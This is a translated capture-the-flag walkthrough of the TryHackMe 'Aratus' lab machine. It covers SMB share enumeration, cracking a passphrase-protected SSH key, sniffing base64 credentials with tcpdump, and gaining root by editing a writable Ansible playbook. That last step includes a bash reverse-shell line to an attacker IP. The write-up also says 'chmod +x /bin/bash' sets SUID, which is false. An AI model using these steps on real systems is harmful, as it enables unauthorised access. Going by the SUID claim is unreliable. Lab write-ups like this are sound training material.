Aratus – Walkthrough En | TryHackMe – Write-up
Enumeration
Commande :
nmap -T5 -p- -sVC 10.10.196.56
There are quite a few very interesting open ports, in particular the FTP port (21) et SMB (139,445).
FTP enumeration
We will start with the simplest a priori, the ftp service. You can access it without a password with the ftp or anonymous account
Command :
ftp 10.10.196.56
There is nothing interesting on the ftp server…
Enumération SMB.
It is possible to enumerate ports 139 and 445 manually with the tools smbget, smbclient, smbmap, but it is also possible to do it more automatically with enum4linux.
Command :
enum4linux 10.10.196.56
It is thus easy to obtain information concerning the shares present, as well as certain usernames.
Recovery of items - temporary share
Access to sharing is open for reading to everyone. There are many folders under folder and file inside the share. There are several techniques to extract all its data.
Command :
smbclient « //10.10.196.56/temporary share »
(Do not forget the double quotes so as not to be blocked by the space between temporary and share.)
First, we will extract the message-to-simeon.txt file with this command :
mget message-to-simeon.txt
Message content :
Simeon,
Stop messing with your home directory, you are moving files and directories insecurely!
Just make a folder in /opt for your book project…
Also you password is insecure, could you please change it? It is all over the place now!
– Theodore
You have to read between the lines and understand that you will probably have to crack a hash. Before you will have to find what to crack in the different texts that we will recover in stride.
Command to retrieve the various elements:
smbget -R « smb://10.10.196.56/temporary share/chapter1 »
It is possible to use this command for all the chapters, it is simple and fast.
It is also possible to do this with a loop, like this:
for i in {1..9}; do smbget -R « smb://10.10.196.56/temporary share/chapter$i »; done
Finally, it is possible to connect to the share and encounter these different commands:
smb: \> prompt
smb: \> recurse
smb: \> mget *
Analysis of files recover.
There are many. The easiest way is to go to the essential. We will open the tree with sublime Text.
Command :
subl .
In paragraph7.1 text2 there is an SSH key.
ssh2john
IT must be copied into a text file and then cracked with johntheripper.
Why?
It is actually protected by a passphrase. We can see it thanks to this mention Proc-Type: 4,ENCRYPTED
Command :
ssh2john id_rsa > id_rsa.hash
john id_rsa.hash -wordlist=/usr/share/wordlists/rockyou.txt
Connexion ssh - Simeon.
We have Simeon’s passphrase and ssh private key. All you have to do is log in with SSH.
Commande :
chmod 600 id_rsa
ssh simeon@10.10.196.56 -i id_rsa
Once connected, linpeas (which must be uploaded to the machine) tells us that it is possible to listen to the traffic.
Which also corresponds to the pcap hint that can be seen on Tryhackme.
TcpDump
We’ll listen to the traffic on lo. On eth1, there is way too much traffic generated by our own ssh connection.
Command :
tcpdump -i lo
Note that there is a http GET connection to /test-auth/index.html. On the other hand, we do not see the content of the request. So we’re going to make a capture again, recording this time, in pcap format.
Command :
tcpdump -i lo -w cap.pcap
You have to wait at least 2 minutes (to have 1 full minute). There is actually a scheduled task that runs every minute to be sure to capture the traffic that is going well.
No possibility to extract the pcap file to Kali.
I failed to do so. You have to open it, and the file is not very readable. But on closer inspection, we see that there is a connection and also an authentication encoded in base64.
Login to Théodore's account
The password once decoded allows access to Theodore’s account with this command :
su theodore
In the /opt folder there are two folders, ansible and script.
Content of the infra_as_code.sh script
Escalade de privilège
There is only one thing you can do to access the root account. You must modify the setup-RedHat.yml file. Indeed, the infra_as_code.sh script cannot be modified, it is not possible to make a path injection, we cannot modify any file whatsoever. Only the setup-RedHat.yml file.
To get to know why this file, you must first do sudo -l.
Launch the script
Command :
sudo -u automation /opt/scripts/infra_as_code.sh
As shown in the following capture, there is an event regarding setup-RedHat.yml.
And it is possible to modify this .yml. There is a « + » at the end of the rights -rw-rw-r–+
Editing the setup-RedHat.yml file
You have to modify the command line to ensure httpd certs… . This is the last part of the yml file. You must also remove the when line, otherwise the reverse shell will not be executed.
Once the modification has been made, you must relaunch the script.
Command :
sudo -u automation /opt/scripts/infra_as_code.sh
Recovery of reverse shell on netcat listener.
The command bash -i >& /dev/tcp/10.11.38.124/1234 0>&1 may not work. In this case, it is possible to assign a SUID to bash with this command :
chmod +x /bin/bash
#
That’s all folks
Thank you for taking the trouble to come to the site to read this Write-Up
I hope he has more of you and that he taught you new things.
Feel free to leave a comment or share this article.
